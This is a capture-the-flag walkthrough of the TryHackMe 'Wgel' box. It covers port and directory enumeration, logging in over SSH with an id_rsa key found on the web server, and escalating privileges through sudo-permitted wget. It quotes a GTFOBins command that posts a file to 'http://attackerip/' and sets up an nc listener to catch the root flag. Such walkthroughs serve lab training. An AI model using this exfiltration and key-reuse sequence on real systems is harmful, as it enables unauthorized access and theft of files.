TryHackMe — Wgel CTF
Wgel CTF
Have fun with this easy box.
Link to the room : TryHackMe | Wgel CTF
Let’s start with a rustscan enumeration.
Run rustscan -a 10.10.10.247 — ulimit 5000 — -A -vvv -sV -sC -Pn
Looking at above results, we have 2 ports open:22,80.
Let’s inspect the view page source on port 80.
It’s look like we had found a user name: jessie.
The next step will be to brute force directories.
Run gobuster dir -u 10.10.158.73 -w /usr/share/dirb/wordlists/common.txt
Let’s check the above discovered directories.
We can notice , we didn’t manage to discover any important information.
So, I like to use the following :
gobuster dir -u http://10.10.158.73/sitemap -w /usr/share/dirb/wordlists/common.txt
to dig deeper.
We have found few subdirectories. Let’s check the subdirectories.
After I checked all the /sitemap/subdirectories , I finally discovered something “juicy” , an id_rsa key.
Create a new file, named ssh. Copy the id_rsa key and paste it to ssh file. Change the permissions for ssh.txt.
Use chmod 600 ssh.
We will attempt to login, using the id_rsa key (ssh) and the found user name “jessie”.
Run ssh -i ssh jessie@10.10.158.73
We successfully logged in. !Let’s check for the user_flag.txt
There we go, user flag!
The next step for us will be : Privilege escalation.
Run sudo -l to discover what commands we can run.
Looking at above result, we can run /usr/bin/wget
Navigate to : GTFOBins. GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
URL=http://attackerip/
LFILE=file_to_send
wget --post-file=$LFILE $URL
Open a new terminal , open a listener , use nc -nvlp 34567 (port number)
Ohh , yeah, we’ve got the root_flag.txt.
Thank you for reading, I hope you enjoyed.
You can find me on : TryHackMe | cody1